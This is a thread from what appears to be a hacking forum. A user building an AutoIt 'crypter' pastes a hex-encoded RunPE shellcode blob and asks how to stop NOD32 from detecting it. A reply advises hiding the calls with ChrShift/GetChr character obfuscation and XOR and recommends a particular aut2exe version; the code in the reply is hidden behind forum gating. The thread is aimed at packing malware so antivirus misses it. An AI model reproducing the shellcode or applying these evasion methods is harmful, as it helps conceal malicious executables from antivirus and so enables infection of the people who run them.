Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked how to generate autoit shellcodes

mark_deno

By INACTIVE mark_deno
in AutoIT

 Share

Recommended Posts

mark_deno Initiate

INACTIVE mark_deno

Posted
Posted (edited)

i currently work on autoit crypter source ( scantime)

so i eddit it with new encryption TEA AND RUNPE(FOR RUNTIME)

result is 5/60

nod32 keep catching this part on my shellcode runpe

$sShellCode = '0xB9B600305835353842454300383143343030464402460000353335363537003634384230353330290300384200784305143030' & _

'03006C000C3430313838390034354643433634351045373437020E38353001020E393431333343305F0242009A014E0182002433031635C4303700' & _

'3F353544004B000BD8433839000B042930002301170237006334453835463600373235433436333344443200453832300021440246009344414331' & _

'45330030323033434238428037393043303337011900413146334135444500373735334238413528463033020F38000F3338004134463037334134' & _

'40444539373532801C340838323487293033444229812836368075398002334368313033815F31802F815F30A04642374339803D31823D48313842' & _

'809633378086380180284634454230343440323445373541828B424246838F43303635818F4388313734820332344482034833364682033436830B' & _

'3592378313363682AF4337841B8838343882133936318203A8413645820342841B4384179244841745348313463082CBD44143834341840F41006E' & _

'C10F244146C3214230C321423149C3134232C3214233C315424234C31542353436C10D42A8363639C20137C40738C407243934C2254241C3294242' & _

'5236C2394243C40744C325421645C325004D41C111393837DDC24B394083C203C43739C40F001B11C233394437C23339453529C2213946C32141C4' & _

'57413191C311413234C25541330052A1C0A941343533C1154180B929C2013636C30337C363413895C41139C34141C41F4142C329243838C31B3839' & _

'C30938419C3732C111C09EC26D3843C34B243844C33D3845C345384649C33B3930C3033931C4013289C3193933C321393434C27D48393537C27939' & _

'36C11D3863408341E74646354047400336774303C11E4003374303412440033877C406C023400339C4064015400341B74303C1E8400342A301A408' & _

'43A30167E1116003A2814646A112A00145276403A308830146372227383025E4003123483832233C383339233E3834231CA00823253637C9224638' & _

'37231B3634C309E1527D802B35A3016108A001E51C621936EDE41C35A301E41C36E0242005E41CFD631936E41CA408E41C21322005E51CFBA308E4' & _

'1C3460196003E51C6046A001ED431146216CA01730C301E144A0016631A301230C37326403621137B633A401220C37E41BA31D356403B1A1503835' & _

'356403A30835641F6D230C35641FA31D35653C220C35EF653C202AA0086A3C35651FE0646003DB651F621135641FA31D35653CA21D5E35651FE076' & _

'E006431846631136FB641FE31436641F2154A024651F220CB636E41BA31D346518E214346518EDA248346518222F34E53763036518F16086383534' & _

'651863036418E32276346518E222346418A340842B46DFA42B6518E322E537A216356418A116F360D9647E4542A11FE001007C617C544544637645' & _

'647A4562AA38AC3533E41AA32A336A33336A33DA336A3333E41A632C33E41AA315B633E41A237533EA1A442C462375FE34E51AE328E51A63256533' & _

'630304077FE175A02AC4237149D000B427731B3275740A34B06738F071C320F30632DB750A721432F517721432740A7403DB3424734933750AB220' & _

'33740A931AF633740A133A33750A9302740A5143B7B016740A530B33F425308944700A6D540B35D18990783510073035342B3288320130128B45B2' & _

'00453001707D313338344435410030463835453530311BF18E507E351202008038423581C00438443034303251041A445190355000700335303476' & _

'35F291B00343808AB20350084444344652104242340494430036303431383030343042383346301F508236382044343542469F0A4333A991014143' & _

'9F0143E00A30350A117006303346B2173530366241D09B464433F10E202A37F43835350834809B7509552A9F05F13107383531742BF001580CD305' & _

'DB110630003474001207383F083008CBD10BB07C30710045411418600B99906B35469018B00642341114EF30A5409E901899074614045076321A06' & _

'46701097033641343036F770146315711A44F118D005330DD3007F5F055305305BB423D302B905109D38DF110B210D7805001ED1003030AD5701BB' & _

'FF05120A38130271A1806D3654AB3C4334E06F50AB11A656253035A646500C7219424490A545D0ABA03844313439700043F0ADBD38274430B1802D' & _

'7028C02935B1019C303131B2C0B111033131320141F21435323334303020308E4331015B155030383433D1A848424243F0213038332A30B7A00A51' & _

'2FB11C367436DF11433029FF21103303F101D0055440322791B1361D2531334451B23232D03638353E42B4063106D66FDF1D3F0635317B3B06C019' & _

'34F564FF0330085D09351646403D90174540144332'

how to pass this

can i use M3 alternative shellcode

;=================================

; Autor M3

; Alternative Shell Execute AutoIt

; Agradecimientos Black Zerox

; Uso : sShell(Ruta + exe)

;=================================

 

Func sShell($Path)

Local $Shell = ObjCreate("shell.application")

$Shell.ShellExecute($Path, "")

EndFunc

Edited by CrypterHacker
Link to comment
Share on other sites
DDoSer Little Hacker

INACTIVE DDoSer

Posted
Posted (edited)

Re: how to generate autoit shellcodes

 

i currently work on autoit crypter source ( scantime)

so i eddit it with new encryption TEA AND RUNPE(FOR RUNTIME)

result is 5/60

nod32 keep catching this part on my shellcode runpe

 

how to pass this

can i use M3 alternative shellcode

;=================================

; Autor M3

; Alternative Shell Execute AutoIt

; Agradecimientos Black Zerox

; Uso : sShell(Ruta + exe)

;=================================

 

Func sShell($Path)

Local $Shell = ObjCreate("shell.application")

$Shell.ShellExecute($Path, "")

EndFunc

 

chequinho rights, the code by M3 simply runs a file.

To bypass memories operation in nod32 u can simply use ChrShift or GetChr with simple math.

Here an example of GetChr with simple math (this method is used by RazorCrypt, but i some change it):

This is the hidden content, please

 

And ChrShift example:

 

This is the hidden content, please

 

My stub with encrypted RunPe dll calls with ChrShift and XOR encryption give this:

[spoiler=Result]

This is the hidden content, please

 

 

Also, use 3.3.8.1 version of aut2exe.

Edited by DDoSer
Link to comment
Share on other sites
  • 2 weeks later...
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.